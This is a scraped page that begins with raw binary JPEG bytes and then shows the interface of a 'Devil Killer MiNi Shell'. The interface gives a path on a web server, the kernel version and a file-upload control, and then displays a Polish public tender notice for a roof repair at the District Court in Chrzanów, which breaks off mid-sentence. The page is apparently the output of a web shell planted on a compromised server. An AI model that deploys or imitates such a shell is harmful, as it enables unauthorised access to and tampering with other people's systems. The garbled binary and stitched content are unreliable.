JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026650501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dachu budynku SR w Chrzanowie przy al. Henryka 23 oraz Sądowej 7 wraz z robotami remontowymi infrastruktury stanowiącej integralną część dachu oraz dachem łącznika komunikac. pomiędzy budynkami </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SĄD REJONOWY W CHRZANOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000322755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Henryka 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrzanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">326261361</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@chrzanow.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chrzanow.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dachu budynku SR w Chrzanowie przy al. Henryka 23 oraz Sądowej 7 wraz z robotami remontowymi infrastruktury stanowiącej integralną część dachu oraz dachem łącznika komunikac. pomiędzy budynkami </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f1bd2d18-8bb0-4dd8-a1ef-d1a021d5ed08</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00266505</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00111833/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont dachu budynku Sądu Rejonowego w Chrzanowie przy al. Henryka 23 oraz ul. Sądowej 7 wraz z pracami remontowymi infrastruktury stanowiącej integralną część dachu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f1bd2d18-8bb0-4dd8-a1ef-d1a021d5ed08 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamówienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl/, dodatkowo wymagania techniczne i organizacyjne systemu określone zostały w rozdziale I pkt 5 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowy opis wymagań określa SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowy opis wymagań określa SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">F.261.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont dachu budynku Sądu Rejonowego w Chrzanowie przy al. Henryka 23 oraz ul. Sądowej 7 wraz z robotami remontowymi infrastruktury stanowiącej integralną część dachu oraz dachem łącznika komunikacyjnego pomiędzy budynkami. Zakres robót obejmuje roboty mające na celu wyeliminowanie przecieków w pokryciu dachowym oraz poprawę stanu technicznego i estetycznego pokrycia i infrastruktury dachowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261210-9 - Wykonywanie pokryć dachowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421160-3 - Instalowanie wyrobów metalowych</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45350000-5 - Instalacje mechaniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został określony w VII rozdziale SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowy okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu oraz opis sposobu dokonania oceny ich spełniania.<br/>1. O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający następujące przesłanki:<br/>a. nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 Pzp, art. 109 ust. 1 pkt<br/>2 lit. a i b oraz pkt 3 i 4 Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego;<br/>b. posiadają uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to<br/>z odrębnych przepisów. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>c. posiadają zdolności techniczne lub zawodowe.<br/>Wykonawca spełni ten warunek, jeżeli wykaże, że:<br/>• w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej dwie<br/>(2) usługi obejmujące roboty budowlane tożsame z przedmiotem zamówienia, tj. remont<br/>dachu, o wartości nie mniejszej niż 600 000,00 zł brutto każda.<br/>• dysponuje lub będzie dysponować co najmniej jedną osobą posiadającą uprawnienia<br/>budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz posiadającą<br/>aktualne zaświadczenie z odpowiedniej Okręgowej Izby Inżynierów Budownictwa,<br/>potwierdzające przynależność do tej Izby. Osoba ta powinna wykazać się minimalnym<br/>doświadczeniem polegającym na wykonaniu w okresie ostatnich 5 lat przed terminem<br/>składania ofert co najmniej 2 robót budowlanych dotyczących wykonania remontu dachu, a<br/>przynajmniej jedna z nich o wartości nie mniejszej niż 300 000,00 zł brutto.<br/>• dysponuje lub będzie dysponować co najmniej jedną osobą posiadającą uprawnienia<br/>budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń<br/>cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych oraz posiadającą aktualne<br/>zaświadczenie z odpowiedniej Okręgowej Izby Inżynierów, potwierdzające przynależność do<br/>tej grupy.<br/>• dysponuje lub będzie dysponować co najmniej jedną osobą posiadającą aktualne świadectwo<br/>kwalifikacyjne w specjalności eksploatacji w zakresie obsługi sieci, instalacji i urządzeń<br/>elektrycznych do 1KV;<br/>d. znajdują się w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>e. posiadają zdolność do występowania w obrocie gospodarczym.<br/>a także, którzy zaoferują wykonanie przedmiotu zamówienia zgodnie z dokumentami zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia, że Wykonawca posiada zdolność do występowania w obrocie<br/>gospodarczym, zobowiązany jest do złożenia:<br/>a. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej. Dokument musi być złożony w formie lub postaci elektronicznej w Systemie<br/>i opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. Jednocześnie Zamawiający informuje, że zgodnie z §13 ust. 2 Rozporządzenia<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz.U. z 2020 r., poz. 2415), w celu potwierdzenia posiadania<br/>przez Wykonawcę zdolności do występowania w obrocie gospodarczym, samodzielnie<br/>pobierze dokumenty dotyczące Wykonawcy i/lub Podwykonawców znajdujące się<br/>w bezpłatnych i ogólnodostępnych bazach danych, pod warunkiem że Wykonawca w ofercie<br/>wskaże dane (właściwy rejestr) umożliwiające dostęp do powyższych informacji.<br/>3. W celu potwierdzenia, że Wykonawca posiada zdolność techniczną i zawodową, zobowiązany<br/>jest do złożenia:<br/>a. wykazu robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonywania oraz podmiotów, na rzecz których roboty zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się<br/>lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – zgodnie<br/>z załączonym wzorem załącznik nr 6 do SWZ. Dokument otrzymany w postaci papierowej<br/>musi zostać złożony w postaci dokumentu elektronicznego, opatrzonego podpisem<br/>kwalifikowanym, podpisem zaufanym lub podpisem osobistym Wykonawcy;<br/>b. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia odpowiedzialnych<br/>za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień i wykształcenia niezbędnych o wykonania zamówienia, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi<br/>osobami, zgodnie z załącznikiem nr 7 do niniejszego SWZ. Dokument musi zostać złożony<br/>w postaci dokumentu elektronicznego, otrzymanego w postaci papierowej, opatrzonego<br/>podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z postępowania o udzielenie<br/>zamówienia:<br/>Wykonawca, na żądanie Zamawiającego, przedstawi następujące dokumenty:<br/>a. informację z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2<br/>i 4 oraz art. 109 ust. 1 pkt 2 lit. a i b oraz pkt 3 Pzp, wystawioną nie wcześniej niż 6 miesięcy<br/>przed upływem terminu składania ofert – dokument otrzymany w postaci papierowej musi<br/>zostać złożony w postaci dokumentu elektronicznego, opatrzonego podpisem<br/>kwalifikowanym, podpisem zaufanym lub podpisem osobistym Wykonawcy. W przypadku<br/>składania informacji z Krajowego Rejestru Karnego otrzymanej przez Wykonawcę za pomocą<br/>systemu informatycznego e-KRK Wykonawca składa w Systemie wszystkie pliki jakie<br/>otrzymał z Krajowego Rejestru Karnego. Wykonawca nie podpisuje otrzymanego pliku.<br/>Informacja musi być złożona w Systemie;<br/>b. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego, o których mowa art. 108 ust. 1 Pzp, art. 109 ust. 1 pkt 2<br/>lit. a i b oraz pkt 3 Pzp – zgodnie z załącznikiem nr 9 do SWZ.<br/>c. Oświadczenia Wykonawcy, że wobec niego nie zachodzą okoliczności z Wykazu określone<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 i Listy Ministra właściwego do<br/>spraw wewnętrznych obejmującej osoby i podmioty, wobec których są stosowane środki,<br/>o których mowa w art. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, w zakresie podstaw wykluczenia wskazanych w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>d. oświadczenie Wykonawcy o przynależności bądź braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu przepisów ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (t.j. Dz.U. z 2021 r., poz. 275) – zgodnie z Załącznikiem nr 4 do niniejszej SWZ.<br/>Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody, że powiązania z<br/>innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie<br/>zamówienia (dotyczy sytuacji, gdy oferty w postępowaniu złożyli wykonawcy należący do tej<br/>samej grupy kapitałowej). Oświadczenie musi być sporządzone w formie lub postaci<br/>elektronicznej, złożone w Systemie i opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium na okres związania ofertą. Wadium utrzymuje nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>2. Wadium powinno być wniesione przed upływem terminu składania ofert. Oferta Wykonawcy, który nie wniesie wadium lub wniesie je w sposób nieprawidłowy, zostanie odrzucona.<br/>3. Wadium ustala się w wysokości: 22 000 zł (słownie: dwadzieścia dwa tysiące złotych 00/100).<br/>4. Wadium wnoszone w formie określonej w ust. 9 należy dołączyć do oferty.<br/>5. Wadium może być wniesione w formach określonych w art. 97 ust. 7 Pzp.<br/>6. Wadium wnoszone w pieniądzu powinno być wpłacone przelewem na konto Zamawiającego: Sąd<br/>Rejonowy w Chrzanowie, Postępowanie prowadzone w trybie podstawowym bez negocjacji „Remont<br/>dachu Sądu Rejonowego w Chrzanowie przy al. Henryka 23 i ul. Sądowej 7”, Zamówienie numer<br/>F.261.5.2025, Sąd Rejonowy w Chrzanowie, 32-500 Chrzanów, al. Henryka 23 na rachunek:<br/>Banku Gospodarstwa Krajowego<br/>77 1130 1017 0021 1001 1490 0004 z dopiskiem „Wadium – F.261.5.2025”<br/>7. W przypadku wnoszenia wadium w pieniądzu środki powinny znaleźć się na rachunku bankowym<br/>Zamawiającego w terminie określonym dla wniesienia wadium. Za moment wniesienia wadium uznaje się moment uznania na rachunku Zamawiającego. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>8. Wadium wnoszone w formie innej niż w pieniądzu musi w szczególności określać bezwarunkowy,<br/>nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego w przypadkach określonych<br/>w art. 98 ust. 6 pkt 1-3 Pzp oraz być ważne przez okres związania ofertą, określony w niniejszej SWZ.<br/>Wadium nie może mieć postanowień ograniczających obowiązek zapłaty wadium.<br/>9. Wadium wniesione w formach określonych w art. 97 ust. 7 pkt 2-4 Pzp należy wnieść za pośrednictwem Platformy w postaci elektronicznej – Zamawiający wymaga złożenia dokumentu wadium poprzez wczytanie na Platformie oryginału dokumentu wadialnego w postaci elektronicznej, tj. np. opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia ze strony gwaranta/poręczyciela. Dokument wadium winien zostać przekazany Zamawiającemu w takiej formie, w jakiej został on ustanowiony przez gwaranta lub poręczyciela (w oryginale).<br/>10. Wadium wniesione w formach określonych w art. 97 ust. 7 pkt 2-4 Pzp w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi obejmować swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub z treści wadium mus i wynikać, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>11. Dokument wadialny musi zawierać informację, że stanowi zabezpieczenie wadium na rzecz Sądu<br/>Rejonowego w Chrzanowie, w postępowaniu nr F.261.5.2025 na „Remont dachu Sądu Rejonowego<br/>w Chrzanowie przy al. Henryka 23 i ul. Sądowej 7”.<br/>12. Wszelkie koszty związane z wniesieniem wadium ponosi Wykonawca. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie:<br/>a. ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/>b. zobowiązani są ustanowić pełnomocnika do reprezentowania 